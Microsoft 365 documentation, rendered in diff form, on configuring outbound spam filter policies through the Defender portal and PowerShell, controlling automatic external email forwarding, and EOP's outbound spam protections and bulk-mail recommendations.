- - **Forwarding rules** section: The setting in this section controls automatic email forwarding by **Exchange Online mailboxes** to external recipients. For more information, see [Control automatic external email forwarding in Microsoft 365](outbound-spam-policies-external-email-forwarding.md).
-
- Select one of the following actions from the **Automatic forwarding rules** dropdown list:
-
- - **Automatic - System-controlled**: This is the default value. This value is now the same as **Off**. When this value was originally introduced, it was equivalent to **On**. Over time, thanks to the principles of [secure by default](secure-by-default.md), the effect of this value was eventually changed to **Off** for all customers. For more information, see [this blog post](https://techcommunity.microsoft.com/t5/exchange-team-blog/all-you-need-to-know-about-automatic-email-forwarding-in/ba-p/2074888).
- - **On**: Automatic external email forwarding isn't disabled by the policy.
- - **Off**: All automatic external email forwarding is disabled by the policy.
-
- > [!NOTE]
- >
- > - Disabling automatic forwarding disables any Inbox rules or [mailbox forwarding](/exchange/recipients-in-exchange-online/manage-user-mailboxes/configure-email-forwarding) (also known as _SMTP forwarding_) that redirects messages to external addresses.
- > - Outbound spam policies don't affect the forwarding of messages between internal users.
- > - When automatic forwarding is disabled by an outbound spam policy, non-delivery reports (also known as NDRs or bounce messages) are generated in the following scenarios:
- > - Messages from external senders for all forwarding methods.
- > - Messages from internal senders **if** the forwarding method is mailbox forwarding. If the forwarding method is an Inbox rule, an NDR isn't generated for internal senders.
-
- - **Notifications** section: Use the settings in the section to configure additional recipients who should receive copies and notifications of suspicious outbound email messages:
-
- - **Send a copy of suspicious outbound messages that exceed these limits to these users and groups**: This setting adds the specified recipients to the Bcc field of suspicious outbound messages.
-
- > [!NOTE]
- > This setting works only in the default outbound spam policy. It doesn't work in custom outbound spam policies that you create.
-
- To enable this setting, select the check box. In the box that appears, click in the box, enter a valid email address, and then press the ENTER key or select the complete value that's displayed below the box.
-
- Repeat this step as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- - **Notify these users and groups if a sender is blocked due to sending outbound spam**
-
- > [!IMPORTANT]
- >
- > - This setting is in the process of being deprecated from outbound spam policies.
- >
- > - The default [alert policy](/purview/alert-policies#threat-management-alert-policies) named **User restricted from sending email** already sends email notifications to members of the **TenantAdmins** (**Global admins**) group when users are blocked due to exceeding the limits in the **Recipient Limits** section. **We strongly recommend that you use the alert policy rather than this setting in the outbound spam policy to notify admins and other users**. For instructions, see [Verify the alert settings for restricted users](outbound-spam-restore-restricted-users.md#verify-the-alert-settings-for-restricted-users).
-
- When you're finished on the **Protection settings** page, select **Next**.
-
-6. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review** page, select **Create**.
-
-7. On the **New anti-spam policy created** page, you can select the links to view the policy, view outbound spam policies, and learn more about outbound spam policies.
-
- When you're finished on the **New anti-spam policy created** page, select **Done**.
-
- Back on the **Anti-spam policies** page, the new policy is listed.
-
-## Use the Microsoft Defender portal to view outbound spam policy details
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-On the **Anti-spam policies** page, the following properties are displayed in the list of policies:
--- **Name**-- **Status**: Values are:
- - **Always on** for the default outbound spam policy (for example, **Anti-spam outbound policy (Default)**).
- - **On** or **Off** for other outbound spam policies.
-- **Priority**: For more information, see the [Set the priority of custom outbound spam policies](#use-the-microsoft-defender-portal-to-set-the-priority-of-custom-outbound-spam-policies) section.-- **Type**: One of the following values for outbound spam policies:
- - **Custom outbound spam policy**
- - Blank for the default outbound spam policy (for example, **Anti-spam outbound policy (Default)**).
-
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific policies.
-
-Select an outbound spam policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-> [!TIP]
-> To see details about other outbound spam policies without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Use the Microsoft Defender portal to take action on outbound spam policies
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-On the **Anti-spam policies** page, select the outbound spam policy from the list by clicking anywhere in the row other than the check box next to the name. Some or all following actions are available in the details flyout that opens:
--- Modify policy settings by clicking **Edit** in each section (custom policies or the default policy)-- :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** or :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** (custom policies only)-- :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** (custom policies only)-- :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** (custom policies only)--
-The actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify outbound spam policies
-
-After you select the default outbound spam policy or a custom policy by clicking anywhere in the row other than the check box next to the name, the policy settings are shown in the details flyout that opens. Select **Edit** in each section to modify the settings within the section. For more information about the settings, see the [Create outbound spam policies](#use-the-microsoft-defender-portal-to-create-outbound-spam-policies) section earlier in this article.
-
-For the default policy, you can't modify the name of the policy, and there are no sender filters to configure (the policy applies to all senders). But, you can modify all other settings in the policy.
-
-### Use the Microsoft Defender portal to enable or disable custom outbound spam policies
-
-You can't disable the default outbound spam policy (it's always enabled).
-
-After you select an enabled custom outbound spam policy (the **Status** value is **On**) by clicking anywhere in the row other than the check box next to the name, select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** at the top of the policy details flyout.
-
-After you select a disabled custom outbound spam policy (the **Status** value is **Off**) by clicking anywhere in the row other than the check box next to the name, select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** at the top of the policy details flyout.
-
-When you're finished in the policy details flyout, select **Close**.
-
-On the **Anti-spam policies** page, the **Status** value of the policy is now **On** or **Off**.
-
-### Use the Microsoft Defender portal to set the priority of custom outbound spam policies
-
-Outbound spam policies are processed in the order that they're displayed on the **Anti-spam policies** page:
--- Custom outbound spam policies are applied in priority order (if they're enabled):
- - A lower priority value indicates a higher priority (0 is the highest).
- - By default, a new outbound spam policy is created with a priority that's lower than the lowest existing custom outbound spam policy (the first is 0, the next is 1, etc.).
- - No two outbound spam policies can have the same priority value.
-- The default outbound spam policy always has the priority value **Lowest**, and you can't change it.-
-Outbound spam protection stops for a sender after the first policy is applied (the highest priority policy for that sender). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-After you select the custom outbound spam policy by clicking anywhere in the row other than the check box next to the name, you can increase or decrease the priority of the policy in the details flyout that opens:
--- The custom policy with the **Priority** value **0** on the **Anti-spam policies** page has the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** action at the top of the details flyout.-- The custom policy with the lowest priority (highest **Priority** value; for example, **3**) has the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** action at the top of the details flyout.-- If you have three or more policies, the policies between **Priority** 0 and the lowest priority have both the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** and the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** actions at the top of the details flyout.-
-When you're finished in the policy details flyout, select **Close**.
-
-Back on the **Anti-spam policies** page, the order of the policy in the list matches the updated **Priority** value.
-
-### Use the Microsoft Defender portal to remove custom outbound spam policies
-
-You can't remove the default outbound spam policy.
-
-After you select the custom outbound spam policy by clicking anywhere in the row other than the check box next to the name, select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** at the top of the flyout, and then select **Yes** in the warning dialog that opens.
-
-On the **Anti-spam policies** page, the deleted policy is no longer listed.
-
-## Use Exchange Online PowerShell or standalone EOP PowerShell to configure outbound spam policies
-
-In PowerShell, the basic elements of an outbound spam policy are:
--- **The outbound spam filter policy**: Specifies the actions for outbound spam filtering verdicts and the notification options.-- **The outbound spam filter rule**: Specifies the priority and sender filters (who the policy applies to) for an outbound spam filter policy.-
-The difference between these two elements isn't obvious when you manage outbound spam policies in the Microsoft Defender portal:
--- When you create a policy in the Defender portal, you're actually creating an outbound spam filter rule and the associated outbound spam filter policy at the same time using the same name for both.-- When you modify a policy in the Defender portal, settings related to the name, priority, enabled or disabled, and sender filters modify the outbound spam filter rule. All other settings modify the associated outbound spam filter policy.-- When you remove a policy from the Defender portal, the outbound spam filter rule and the associated outbound spam filter policy are removed at the same time.-
-In PowerShell, the difference between outbound spam filter policies and outbound spam filter rules is apparent. You manage spam filter policies by using the **\*-HostedOutboundSpamFilterPolicy** cmdlets, and you manage spam filter rules by using the **\*-HostedOutboundSpamFilterRule** cmdlets.
--- In PowerShell, you create the outbound spam filter policy first, then you create the outbound spam filter rule, which identifies the associated policy that the rule applies to.-- In PowerShell, you modify the settings in the outbound spam filter policy and the outbound spam filter rule separately.-- When you remove an outbound spam filter policy from PowerShell, the corresponding outbound spam filter rule isn't automatically removed, and vice versa.-
-### Use PowerShell to create outbound spam policies
-
-Creating an outbound spam policy in PowerShell is a two-step process:
-
-1. Create the outbound spam filter policy.
-2. Create the outbound spam filter rule that specifies the outbound spam filter policy that the rule applies to.
-
- **Notes**:
-
- - You can create a new outbound spam filter rule and assign an existing, unassociated outbound spam filter policy to it. An outbound spam filter rule can't be associated with more than one outbound spam filter policy.
- - You can configure the following settings on new outbound spam filter policies in PowerShell that aren't available in the Microsoft Defender portal until after you create the policy:
- - Create the new policy as disabled (_Enabled_ `$false` on the **New-HostedOutboundSpamFilterRule** cmdlet).
- - Set the priority of the policy during creation (_Priority_ _\<Number\>_) on the **New-HostedOutboundSpamFilterRule** cmdlet).
- - A new outbound spam filter policy that you create in PowerShell isn't visible in the Microsoft Defender portal until you assign the policy to an outbound spam filter rule.
-
-#### Step 1: Use PowerShell to create an outbound spam filter policy
-
-To create an outbound spam filter policy, use this syntax:
-
-```PowerShell
-New-HostedOutboundSpamFilterPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] <Additional Settings>
-```
-
-This example creates a new outbound spam filter policy named Contoso Executives with the following settings:
--- The recipient rate limits are restricted to smaller values that the defaults. For more information, see [Sending limits across Microsoft 365 options](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits#sending-limits-across-office-365-options).--- After one of the limits is reached, the user is prevented from sending messages.-
-```PowerShell
-New-HostedOutboundSpamFilterPolicy -Name "Contoso Executives" -RecipientLimitExternalPerHour 400 -RecipientLimitInternalPerHour 800 -RecipientLimitPerDay 800 -ActionWhenThresholdReached BlockUser
-```
-
-For detailed syntax and parameter information, see [New-HostedOutboundSpamFilterPolicy](/powershell/module/exchange/new-hostedoutboundspamfilterpolicy).
-
-#### Step 2: Use PowerShell to create an outbound spam filter rule
-
-To create an outbound spam filter rule, use this syntax:
-
-```PowerShell
-New-HostedOutboundSpamFilterRule -Name "<RuleName>" -HostedOutboundSpamFilterPolicy "<PolicyName>" <Sender filters> [<Sender filter exceptions>] [-Comments "<OptionalComments>"]
-```
-
-This example creates a new outbound spam filter rule named Contoso Executives with these settings:
--- The outbound spam filter policy named Contoso Executives is associated with the rule.-- The rule applies to members of the group named Contoso Executives Group.-
-```PowerShell
-New-HostedOutboundSpamFilterRule -Name "Contoso Executives" -HostedOutboundSpamFilterPolicy "Contoso Executives" -FromMemberOf "Contoso Executives Group"
-```
-
-For detailed syntax and parameter information, see [New-HostedOutboundSpamFilterRule](/powershell/module/exchange/new-hostedoutboundspamfilterrule).
-
-### Use PowerShell to view outbound spam filter policies
-
-To return a summary list of all outbound spam filter policies, run this command:
-
-```PowerShell
-Get-HostedOutboundSpamFilterPolicy
-```
-
-To return detailed information about a specific outbound spam filter policy, use this syntax:
-
-```PowerShell
-Get-HostedOutboundSpamFilterPolicy -Identity "<PolicyName>" | Format-List [<Specific properties to view>]
-```
-
-This example returns all the property values for the outbound spam filter policy named Executives.
-
-```PowerShell
-Get-HostedOutboundSpamFilterPolicy -Identity "Executives" | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-HostedOutboundSpamFilterPolicy](/powershell/module/exchange/get-hostedoutboundspamfilterpolicy).
-
-### Use PowerShell to view outbound spam filter rules
-
-To view existing outbound spam filter rules, use the following syntax:
-
-```PowerShell
-Get-HostedOutboundSpamFilterRule [-Identity "<RuleIdentity>"] [-State <Enabled | Disabled>]
-```
-
-To return a summary list of all outbound spam filter rules, run this command:
-
-```PowerShell
-Get-HostedOutboundSpamFilterRule
-```
-
-To filter the list by enabled or disabled rules, run the following commands:
-
-```PowerShell
-Get-HostedOutboundSpamFilterRule -State Disabled
-```
-
-```PowerShell
-Get-HostedOutboundSpamFilterRule -State Enabled
-```
-
-To return detailed information about a specific outbound spam filter rule, use this syntax:
-
-```PowerShell
-Get-HostedOutboundSpamFilterRule -Identity "<RuleName>" | Format-List [<Specific properties to view>]
-```
-
-This example returns all the property values for the outbound spam filter rule named Contoso Executives.
-
-```PowerShell
-Get-HostedOutboundSpamFilterRule -Identity "Contoso Executives" | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-HostedOutboundSpamFilterRule](/powershell/module/exchange/get-hostedoutboundspamfilterrule).
-
-### Use PowerShell to modify outbound spam filter policies
-
-The same settings are available when you modify an outbound spam filter policy in PowerShell as when you create the policy as described in the [Step 1: Use PowerShell to create an outbound spam filter policy](#step-1-use-powershell-to-create-an-outbound-spam-filter-policy) section earlier in this article.
-
-> [!NOTE]
-> You can't rename an outbound spam filter policy (the **Set-HostedOutboundSpamFilterPolicy** cmdlet has no _Name_ parameter). When you rename an outbound spam policy in the Microsoft Defender portal, you're only renaming the outbound spam filter _rule_.
-
-To modify an outbound spam filter policy, use this syntax:
-
-```PowerShell
-Set-HostedOutboundSpamFilterPolicy -Identity "<PolicyName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-HostedOutboundSpamFilterPolicy](/powershell/module/exchange/set-hostedoutboundspamfilterpolicy).
-
-### Use PowerShell to modify outbound spam filter rules
-
-The only setting that isn't available when you modify an outbound spam filter rule in PowerShell is the _Enabled_ parameter that allows you to create a disabled rule. To enable or disable existing outbound spam filter rules, see the next section.
-
-Otherwise, no additional settings are available when you modify an outbound spam filter rule in PowerShell. The same settings are available when you create a rule as described in the [Step 2: Use PowerShell to create an outbound spam filter rule](#step-2-use-powershell-to-create-an-outbound-spam-filter-rule) section earlier in this article.
-
-To modify an outbound spam filter rule, use this syntax:
-
-```PowerShell
-Set-HostedOutboundSpamFilterRule -Identity "<RuleName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-HostedOutboundSpamFilterRule](/powershell/module/exchange/set-hostedoutboundspamfilterrule).
-
-### Use PowerShell to enable or disable outbound spam filter rules
-
-Enabling or disabling an outbound spam filter rule in PowerShell enables or disables the whole outbound spam policy (the outbound spam filter rule and the assigned outbound spam filter policy). You can't enable or disable the default outbound spam policy (it's always applied to all senders).
-
-To enable or disable an outbound spam filter rule in PowerShell, use this syntax:
-
-```PowerShell
-<Enable-HostedOutboundSpamFilterRule | Disable-HostedOutboundSpamFilterRule> -Identity "<RuleName>"
-```
-
-This example disables the outbound spam filter rule named Marketing Department.
-
-```PowerShell
-Disable-HostedOutboundSpamFilterRule -Identity "Marketing Department"
-```
-
-This example enables same rule.
-
-```PowerShell
-Enable-HostedOutboundSpamFilterRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Enable-HostedOutboundSpamFilterRule](/powershell/module/exchange/enable-hostedoutboundspamfilterrule) and [Disable-HostedOutboundSpamFilterRule](/powershell/module/exchange/disable-hostedoutboundspamfilterrule).
-
-### Use PowerShell to set the priority of outbound spam filter rules
-
-The highest priority value you can set on a rule is 0. The lowest value you can set depends on the number of rules. For example, if you have five rules, you can use the priority values 0 through 4. Changing the priority of an existing rule can have a cascading effect on other rules. For example, if you have five custom rules (priorities 0 through 4), and you change the priority of a rule to 2, the existing rule with priority 2 is changed to priority 3, and the rule with priority 3 is changed to priority 4.
-
-To set the priority of an outbound spam filter rule in PowerShell, use the following syntax:
-
-```PowerShell
-Set-HostedOutboundSpamFilterRule -Identity "<RuleName>" -Priority <Number>
-```
-
-This example sets the priority of the rule named Marketing Department to 2. All existing rules that have a priority less than or equal to 2 are decreased by 1 (their priority numbers are increased by 1).
-
-```PowerShell
-Set-HostedOutboundSpamFilterRule -Identity "Marketing Department" -Priority 2
-```
-
-**Notes**:
--- To set the priority of a new rule when you create it, use the _Priority_ parameter on the **New-HostedOutboundSpamFilterRule** cmdlet instead.-- The outbound default spam filter policy doesn't have a corresponding spam filter rule, and it always has the unmodifiable priority value **Lowest**.-
-### Use PowerShell to remove outbound spam filter policies
-
-When you use PowerShell to remove an outbound spam filter policy, the corresponding outbound spam filter rule isn't removed.
-
-To remove an outbound spam filter policy in PowerShell, use this syntax:
-
-```PowerShell
-Remove-HostedOutboundSpamFilterPolicy -Identity "<PolicyName>"
-```
-
-This example removes the outbound spam filter policy named Marketing Department.
-
-```PowerShell
-Remove-HostedOutboundSpamFilterPolicy -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-HostedOutboundSpamFilterPolicy](/powershell/module/exchange/remove-hostedoutboundspamfilterpolicy).
-
-### Use PowerShell to remove outbound spam filter rules
-
-When you use PowerShell to remove an outbound spam filter rule, the corresponding outbound spam filter policy isn't removed.
-
-To remove an outbound spam filter rule in PowerShell, use this syntax:
-
-```PowerShell
-Remove-HostedOutboundSpamFilterRule -Identity "<PolicyName>"
-```
-
-This example removes the outbound spam filter rule named Marketing Department.
-
-```PowerShell
-Remove-HostedOutboundSpamFilterRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-HostedOutboundSpamFilterRule](/powershell/module/exchange/remove-hostedoutboundspamfilterrule).
-
-## For more information
-
-[Remove blocked users from the Restricted entities page](outbound-spam-restore-restricted-users.md)
-
-[High-risk delivery pool for outbound messages](outbound-spam-high-risk-delivery-pool-about.md)
-
-[Anti-spam protection FAQ](anti-spam-protection-faq.yml)
-
-[Auto forwarded messages report in the EAC](/exchange/monitoring/mail-flow-reports/mfr-auto-forwarded-messages-report)
security Outbound Spam Policies External Email Forwarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/outbound-spam-policies-external-email-forwarding.md
- Title: Configuring and controlling external email forwarding in Microsoft 365
- - NOCSH
--- Previously updated : 06/19/2023---- m365-security-- tier2--- seo-marvel-apr2020-- adminvideo
-description: This article covers topics including external email forwarding, Automatic forwarding, 5.7.520 Access Denied messages, disabling external forwarding, 'Your administrator has disabled external forwarding' messages, as well as outbound anti-spam policy.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Control automatic external email forwarding in Microsoft 365
--
-As an admin, you might have company requirements to restrict or control automatically forwarded messages to external recipients (recipients outside of your organization). Email forwarding can be useful, but can also pose a security risk due to the potential disclosure of information. Attackers might use this information to attack your organization or partners.
-
-The following types of automatic forwarding are available in Microsoft 365:
--- Users can configure [Inbox rules](https://support.microsoft.com/office/c24f5dea-9465-4df4-ad17-a50704d66c59) to automatically forward messages to external senders (deliberately or as a result of a compromised account).-- Admins can configure [mailbox forwarding](/exchange/recipients-in-exchange-online/manage-user-mailboxes/configure-email-forwarding) (also known as _SMTP forwarding_) to automatically forward messages to external recipients. The admin can choose whether to simply forward messages, or keep copies of forwarded messages in the mailbox.-
-> [!NOTE]
-> Users with automatic forwarding from on-premises email systems through Microsoft 365 will be subject to the same policy controls as cloud mailboxes in an upcoming update. This update will be communicated via Message Center post.
-
-You can use outbound spam filter policies to control automatic forwarding to external recipients. Three settings are available:
--- **Automatic - System-controlled**: This is the default setting. This setting is now the same as **Off**. When this setting was originally introduced, it was equivalent to **On**. Over time, thanks to the principles of [secure by default](secure-by-default.md), this setting was gradually changed to **Off** for all customers. For more information, see [this blog post](https://techcommunity.microsoft.com/t5/exchange-team-blog/all-you-need-to-know-about-automatic-email-forwarding-in/ba-p/2074888).-- **On**: Automatic external forwarding is allowed and not restricted.-- **Off**: Automatic external forwarding is disabled and will result in a non-delivery report (also known as an NDR or bounce message) to the sender.-
-For instructions on how to configure these settings, see [Configure outbound spam filtering in EOP](outbound-spam-policies-configure.md).
-
-> [!NOTE]
->
-> - Disabling automatic forwarding disables any Inbox rules (users) or mailbox forwarding (admins) that redirect messages to external addresses.
-> - Automatic forwarding of messages between internal users isn't affected by the settings in outbound spam filter policies.
-
-## How the outbound spam filter policy settings work with other automatic email forwarding controls
-
-As an admin, you might have already configured other controls to allow or block automatic email forwarding. For example:
--- [Remote domains](/exchange/mail-flow-best-practices/remote-domains/remote-domains) to allow or block automatic email forwarding to some or all external domains.-- Conditions and actions in Exchange [mail flow rules](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules) (also known as transport rules) to detect and block automatically forwarded messages to external recipients.-
-When one setting allows external forwarding, but another setting blocks external forwarding, the block typically wins. Examples are described in the following table:
-
-|Scenario|Result|
-|||
-|<ul><li>You configure remote domain settings to allow automatic forwarding.</li><li>Automatic forwarding in the outbound spam filter policy is set to **Off**.</li></ul>|Automatically forwarded messages to recipients in the affected domains are blocked.|
-|<ul><li>You configure remote domain settings to allow automatic forwarding.</li><li>Automatic forwarding in the outbound spam filter policy is set to **Automatic - System-controlled**.</li></ul>|Automatically forwarded messages to recipients in the affected domains are blocked. <p> As described earlier, **Automatic - System-controlled** used to mean **On**, but the setting has changed over time to mean **Off** in all organizations. <p> For absolute clarity, you should configure your outbound spam filter policy to **On** or **Off**.|
-|<ul><li>Automatic forwarding in the outbound spam filter policy is set to **On**</li><li>You use mail flow rules or remote domains to block automatically forwarded email.</li></ul>|Automatically forwarded messages to affected recipients are blocked by mail flow rules or remote domains.|
-
-You can use this behavior (for example) to allow automatic forwarding in outbound spam filter policies, but use remote domains to control the external domains that users can forward messages to.
-
-## How to find users that are automatically forwarding
-
-You can see information about users that are automatically forwarding messages to external recipients in the [Auto forwarded messages report](/exchange/monitoring/mail-flow-reports/mfr-auto-forwarded-messages-report) for cloud-based accounts. For on-premises users that automatically forward from their on-premises email system through Microsoft 365, you need to create a mail flow rule to track these users. For instructions on how to create a mail flow rule, see [Use the EAC to create a mail flow rule](/exchange/security-and-compliance/mail-flow-rules/manage-mail-flow-rules#use-the-eac-to-create-a-mail-flow-rule).
-
-The following information is required to create the mail flow rule in the Exchange admin center (EAC):
--- **Apply this rule if** (condition): **A message header** \> **matches these text patterns**. Note you might need to click **More options** to see this option.
- - **Header name**: `X-MS-Exchange-Inbox-Rules-Loop`
- - **Header value**: `.`
-
- The condition looks like this: **'X-MS-Exchange-Inbox-Rules-Loop'** header matches **'.'**
-
- This condition will match any value for the header.
--- (Optional) **Do the following** (action): You can configure an optional action. For example, you can use the action **Modify the message properties** \> **set a message header**, with the header name **X-Forwarded** and the value **True**. But, configuring an action is not required.-- Set **Audit this rule with severity level** to the value **Low**, **Medium**, or **High**. This setting allows you to use the [Exchange transport rule report](reports-email-security.md#exchange-transport-rule-report) to get details of users that are forwarding.--
-## Blocked email forwarding messages
-
-When a message is detected as automatically forwarded, and the [outbound spam filter](outbound-spam-policies-configure.md) policy *blocks* that activity, the message is returned to the sender in an NDR that contains the following information:
-
-`5.7.520 Access denied, Your organization does not allow external forwarding. Please contact your administrator for further assistance. AS(7555)`
security Outbound Spam Protection About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/outbound-spam-protection-about.md
- Title: Outbound spam protection
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn about the outbound spam controls in Exchange Online Protection (EOP), and what to do if you need to send mass mailings.
- Previously updated : 1/29/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Outbound spam protection in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, we take managing outbound spam seriously. Even if one customer intentionally or unintentionally sends spam from their organization, that action can degrade the reputation of the whole service and can affect email delivery for other customers.
-
-This article describes the controls and notifications that are designed to help prevent outbound spam, and what you can do if you need to send mass mailings.
-
-## What admins can do to control outbound spam
--- **Use built-in notifications**: When a user exceeds sending limits of [the service](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits#sending-limits-across-office-365-options) or [outbound spam policies](outbound-spam-policies-configure.md) and is restricted from sending email, the default alert policy named **User restricted from sending email** sends email notifications to members of the **TenantAdmins** (**Global admins**) group. To configure who else receives these notifications, see [Verify the alert settings for restricted users](outbound-spam-restore-restricted-users.md#verify-the-alert-settings-for-restricted-users). Also, the default alert policies named **Email sending limit exceeded** and **Suspicious email sending patterns detected** send email notifications to members of the **TenantAdmins** (**Global admins**) group. For more information about alert policies, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).--- **Review spam complaints from third-party email providers**: Many email services like Outlook.com, Yahoo, and AOL provide a feedback loop where we review our messages that are identified as spam by their users. To learn more about sender support for Outlook.com, go to <https://sendersupport.olc.protection.outlook.com/pm/services.aspx>.-
-## How EOP controls outbound spam
--- **Segregation of outbound email traffic**: Every outbound message that's sent through the service is scanned for spam. If the message is determined to be spam, it's delivered from a secondary, less reputable IP address pool named the _high-risk delivery pool_. For more information, see [High-risk delivery pool for outbound messages](outbound-spam-high-risk-delivery-pool-about.md).--- **Monitoring our source IP address reputation**: Microsoft 365 queries various third-party IP blocklists. An alert is generated if any of the IP addresses that we use for outbound email appear on these lists. This monitoring allows us to react quickly when spam has caused our reputation to degrade. When an alert is generated, we have internal documentation that outlines how to get our IP addresses remove (delisted) from blocklists.--- **Disable accounts that send too much spam**<sup>\*</sup>: Even though we segregate outbound spam into the high-risk delivery pool, we can't allow an account (often, a compromised account) to send spam indefinitely. We monitor accounts that are sending spam, and when they exceed an undisclosed limit, the account is blocked from sending email. There are different thresholds for individual users and the entire tenant.--- **Disabling accounts that send too much email too quickly**<sup>\*</sup>: In addition to the limits that look for messages marked as spam, there are also limits that block accounts when they reach an overall outbound message limit, regardless the spam filtering verdict on the outbound messages. A compromised account could send zero-day (previously unrecognized) spam that's missed by the spam filter. Because it can be difficult to identify a legitimate mass mailing campaign vs. a spam campaign, these limits help to minimize any potential damage.-
-<sup>\*</sup> We don't advertise the exact limits so spammers can't game the system, and so we can increase or decrease the limits as necessary. The limits are high enough to prevent an average business user from ever exceeding them, and low enough to help contain the damage caused by a spammer.
-
-## Recommendations for customers who want to send mass mailings through EOP
-
-It's difficult to strike a balance between customers who want to send a large volume of email vs. protecting the service from compromised accounts and bulk email senders with poor recipient acquisition practices. It's better for us to block a user who's sending too much email than allow bulk activity that results in Microsoft 365 email servers landing on a third-party IP blocklist. The associated cost and risk to the service are simply too great.
-
-As described in the [Exchange Online Service Description](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits), using EOP to send bulk email isn't a supported use of the service, and is permitted only on a "best-effort" basis. For customers who want to send bulk email using EOP, we have the following recommendations:
--- Don't send a large rate or volume of email that causes you to run afoul of the [sending limits](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits#sending-limits-1) in the service. This recommendation also includes not sending email to a large list of Bcc recipients.-- Avoid using addresses in your primary email domain (for example, contoso.com) as senders for bulk email. Doing so can affect the delivery of regular email from senders in the domain. Consider using a custom subdomain exclusively for bulk email. For example, use `m.contoso.com` for marketing email and `t.contoso.com` for transactional email.-- Configure any custom subdomains with email authentication records in DNS ([SPF](email-authentication-spf-configure.md), [DKIM](email-authentication-dkim-configure.md), and [DMARC](email-authentication-dmarc-configure.md)). Many email service providers (for example, Gmail, Yahoo!, and Outlook.com) are configured to reject messages that don't meet email authentication standards.-- Marketing email (especially newsletters) should always include a way to unsubscribe from future messages. Some senders require recipients to send an email to a specified alias with the value "Unsubscribe" in the Subject line. However, a one-click option to unsubscribe is preferable for a smoother process.-- Eliminate incorrect and non-existent email aliases from your databases. Any email alias causing a bounce-back is not only unnecessary but also poses a risk to your outbound emails, potentially triggering increased scrutiny from email filtering services. Keep your email database current and devoid of redundant or useless email addresses to maintain deliverability and reputation.-
-Use the following resources outside of EOP to send bulk email:
